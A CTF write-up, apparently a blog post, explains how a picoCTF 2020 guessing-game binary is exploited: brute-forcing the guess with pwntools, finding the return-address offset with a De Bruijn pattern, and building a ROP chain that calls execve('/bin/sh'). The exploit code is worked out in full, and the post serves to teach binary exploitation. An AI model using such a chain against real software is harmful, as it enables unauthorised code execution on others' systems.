This year I decided to compete in the picoCTF 2020 Mini-Competition as my first CTF.

This is the first post in a series covering the tasks of the competition.

The task

A screenshot of the competition task.

The shown task can be found here

The code

int main(int argc, char **argv){

	int res;
	
	printf("Welcome to my guessing game!\n\n");
	
	while (1) {
		res = do_stuff();
		if (res) {
			win();
		}
	}
	
	return 0;
}

The program consists of a loop calling do_stuff(). In case do_stuff returns a truthy value, we also call win(). Examining win() we can spot a buffer overflow:

#define BUFSIZE 100

void win() {
	char winner[BUFSIZE];
	printf("New winner!\nName? ");
	fgets(winner, 360, stdin);
	printf("Congrats %s\n\n", winner);
}

We are prompted to enter a name, and fgets() reads up to 360 bytes (including the terminating null byte) into a buffer that only holds 100. This results in a buffer overflow if we enter a name longer than 99 characters.

To exploit the buffer overflow, we need to win the game.

But how do we win the game?

long increment(long in) {
	return in + 1;
}

long get_random() {
	return rand() % BUFSIZE;
}

int do_stuff() {
	long ans = get_random();
	ans = increment(ans);
	int res = 0;
	
	printf("What number would you like to guess?\n");
	char guess[BUFSIZE];
	fgets(guess, BUFSIZE, stdin);
	
	long g = atol(guess);
	if (!g) {
		printf("That's not a valid number!\n");
	} else {
		if (g == ans) {
			printf("Congrats! You win! Your prize is this print statement!\n\n");
			res = 1;
		} else {
			printf("Nope!\n\n");
		}
	}
	return res;
}

Sadly there seems to be no way to cheat; we just have to get lucky and guess a number between 1 and 100. However, since computers are fast, that should not be an issue.

So before diving into exploiting the buffer overflow, we should be able to reliably win the game.

For this, we can use pwnlib:

from pwn import *
import time

LOCAL = True

local_bin = "./vuln"

if LOCAL:
    p = process(local_bin)

else:
    p = remote('jupiter.challenges.picoctf.org', 50581)

progress = log.progress('Winning the game...')
attempts = 1
start_time = time.time()

# win the game

p.sendline(b'1')
result = p.recvline_contains((b'Nope!', b'New winner'))
while result == b'Nope!':
    current_time = time.time()
    time_per_attempt = (current_time - start_time) / attempts
    needed_attempts = 300 - attempts
    eta = needed_attempts * time_per_attempt

    progress.status('{}/~300 attempts, {:0.3}s per attempt ETA~{:0.3}s'.format(attempts, time_per_attempt, eta))
    attempts += 1
    p.sendline(b'1')
    result = p.recvline_contains((b'Nope!', b'New winner'))
progress.success('We won!!')

This code is set up so we can develop our exploit locally (with a debugger etc.) and then switch to remote once we are confident that it works.

All this code does is repeatedly guess 1 and send it to the process until we’ve won.
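As a rough sanity check on the "~300 attempts" figure used in the progress message, here is a minimal sketch of the odds. It assumes each round's answer behaves like an independent, uniform draw from 1 to 100, which is only an approximation of what rand() produces; the helper name win_probability is made up for this illustration.

```python
OUTCOMES = 100  # do_stuff() computes rand() % 100 + 1, so 100 possible answers


def win_probability(attempts, outcomes=OUTCOMES):
    """Chance that one fixed guess hits at least once in `attempts` rounds.

    Assumption: every round is an independent, uniform draw.
    """
    miss = 1 - 1 / outcomes
    return 1 - miss ** attempts


if __name__ == "__main__":
    for attempts in (100, 300, 500):
        print(f"{attempts:>3} attempts: {win_probability(attempts):.1%}")
```

Under that assumption, a single fixed guess needs 100 rounds on average, and a few hundred rounds make a win very likely, which is why always sending 1 is good enough here.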

Now we can try to win the game:

And remotely so we can see our fancy progress bars and feel prouder:

Now that we can reliably reach the buffer overflow, given enough time, we’re ready to exploit it.

The exploit

The stack stores the current return address in close proximity to the buffer we are overflowing. Our first step is to find out exactly at which offset from the start of the buffer that address sits. For that we could manually inspect the program in a debugger, but pwnlib supplies a handy utility.

pwnlib.util.cyclic.cyclic(1000, n=8) generates the first 1000 characters of a De Bruijn sequence.

This is a sequence in which every substring of length 8 occurs at most once.

So [0..8] != [1..9], [1..9] != [2..10], etc. This implies that if we see an arbitrary slice [x..(x+8)] of the sequence, we can figure out x just by looking at its content.
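To make the uniqueness property concrete, here is a small pure-Python sketch that does not depend on pwnlib. It uses the textbook recursive construction of a De Bruijn sequence over the lowercase alphabet; the names de_bruijn, pattern and find_offset are made up for this illustration, and the output is not guaranteed to match pwnlib's byte for byte.

```python
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet, n):
    """Lazily yield the symbols of a De Bruijn sequence of order n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


# Only the first 1000 symbols are needed, so the generator is cut short.
pattern = "".join(islice(de_bruijn(ascii_lowercase, 8), 1000))

# Every 8-character window of the pattern is distinct ...
windows = [pattern[i:i + 8] for i in range(len(pattern) - 7)]
assert len(set(windows)) == len(windows)


# ... so any window we observe identifies its own position.
def find_offset(chunk):
    return pattern.find(chunk)


print(find_offset(pattern[120:128]))
```

The lookup at the end is the same idea as cyclic_find: whatever 8 bytes end up in the return address tell us how far into the input they were.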

We overwrite the return address with an unknown part of the sequence, and the program tries to jump to that address.

This results in a SIGSEGV, a result of accessing invalid memory, showing us exactly what address was accessed.

This information is enough to figure out at which offset from the buffer the return address is stored, 120 in our case.

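# Set this to the number printed below once it is known
OFFSET = None
if OFFSET is None:
    log.info('Determining OFFSET...')
    p.clean()
    # Overflow the buffer with a pattern whose 8-byte windows are unique
    payload = cyclic(1000, n=8)
    p.sendline(payload)
    # Wait for the crash, then read the faulting address from the core dump
    p.wait()
    core = Corefile('./core')
    found_offset = cyclic_find(core.fault_addr, n=8)
    log.info('Found OFFSET: {}, set the variable and rerun the exploit'.format(found_offset))
    exit()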

At this point we are able to continue executing from an arbitrary address. Combined with our ability to write arbitrary data (e.g. a program) into memory, this used to be enough to run shellcode.

Nowadays, we usually cannot execute code stored on the stack because of executable-space protection. We are able to write a program into the buffer, but trying to execute it would result in a crash.

To execute a (nearly) arbitrary program, we need to use Return-oriented programming.

Pwnlib exposes tools to find the necessary gadgets. The syntax for that is not documented too well, so I needed to use an external tool to find one of the gadgets.

The shellcode

Our goal is to gain shell access. The easiest way to accomplish this is to call the execve() system call with /bin/sh.

Finding a tailored data copy routine, or writing one ourselves within the constraints, is fairly difficult. Luckily we are on a 64-bit system, and our payload /bin/sh (7 characters plus a terminating null byte) fits entirely within one 8-byte register.
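A quick way to convince yourself that the string fits is to pack it by hand. The following is a minimal sketch using only the standard library; the value assigned to SH_STRING is an assumption about how that constant might be defined, since its definition is not shown in this post.

```python
import struct

# Assumed definition: the path plus its terminating null byte
SH_STRING = b"/bin/sh\x00"

# Exactly 8 bytes, i.e. one 64-bit register or one stack slot
assert len(SH_STRING) == 8

# The same bytes viewed as the little-endian integer a `pop` would load
as_register = struct.unpack("<Q", SH_STRING)[0]
print(hex(as_register))

# Writing that register back to memory reproduces the original string
assert struct.pack("<Q", as_register) == SH_STRING
```

Because the string already occupies exactly one 8-byte slot, it can be placed in the chain as-is, without p64(), and a single pop followed by a single store is enough to get it into memory.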

payload = (
# Fill the buffer up to the point where the next 8 bytes
# overwrite the return address (OFFSET is the number found above)
b'A' * OFFSET +
# POP the next value into RAX
p64(POP_RAX) +
# We use .bss as our scratchpad, it is readable and writable
p64(elf.bss()) +
# POP the string /bin/sh into RDX
p64(POP_RDX) +
SH_STRING +
# Move the contents of RDX (/bin/sh) into the memory
# pointed to by RAX (the beginning of the .bss section)
p64(MOV_PRAX_RDX) +
# Prepare for calling execve,
# load its system call number (59) into RAX
p64(POP_RAX) +
p64(59) +
# Load the address of the /bin/sh string into RDI,
# this is the pathname argument of execve
p64(POP_RDI) +
p64(elf.bss()) +
# We do not have any arguments, load a null pointer into RSI
p64(POP_RSI) +
p64(0) +
# We do not need an environment, load a null pointer into RDX
p64(POP_RDX) +
p64(0) +
# Do the system call
p64(SYSCALL))
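To see what this chain does step by step, it can help to trace it with a toy model. The sketch below is not an emulator and does not touch the real binary: the gadget addresses and the BSS value are made up, and each gadget is modelled as "do one thing, then ret to the next word on the stack". It only illustrates the register and memory state the chain is meant to reach before the system call.

```python
import struct

# Hypothetical addresses, invented for this toy model only
POP_RAX, POP_RDX, POP_RDI, POP_RSI = 0x1000, 0x1008, 0x1010, 0x1018
MOV_PRAX_RDX, SYSCALL = 0x1020, 0x1028
BSS = 0x2000  # stand-in for elf.bss()


def run_chain(chain):
    """Consume 64-bit words the way a sequence of `ret`s would."""
    stack = list(chain)
    regs = {"rax": 0, "rdx": 0, "rdi": 0, "rsi": 0}
    memory = {}
    pops = {POP_RAX: "rax", POP_RDX: "rdx", POP_RDI: "rdi", POP_RSI: "rsi"}
    while stack:
        gadget = stack.pop(0)  # `ret` takes the next gadget address
        if gadget in pops:
            # `pop reg; ret` loads the following word into the register
            regs[pops[gadget]] = stack.pop(0)
        elif gadget == MOV_PRAX_RDX:
            # `mov [rax], rdx; ret` stores 8 bytes at the address in RAX
            memory[regs["rax"]] = struct.pack("<Q", regs["rdx"])
        elif gadget == SYSCALL:
            return regs, memory  # state handed to the kernel
        else:
            raise ValueError(f"unknown gadget {gadget:#x}")
    raise ValueError("chain ended without a syscall")


sh = struct.unpack("<Q", b"/bin/sh\x00")[0]
chain = [
    POP_RAX, BSS, POP_RDX, sh, MOV_PRAX_RDX,  # write "/bin/sh" to .bss
    POP_RAX, 59,                              # execve system call number
    POP_RDI, BSS,                             # pathname
    POP_RSI, 0,                               # argv = NULL
    POP_RDX, 0,                               # envp = NULL
    SYSCALL,
]
regs, memory = run_chain(chain)
print(regs, memory)
```

In the model, the final state has RAX set to 59, RDI pointing at the string stored in the scratch area, and RSI and RDX set to zero, which is the calling convention execve expects on x86-64 Linux.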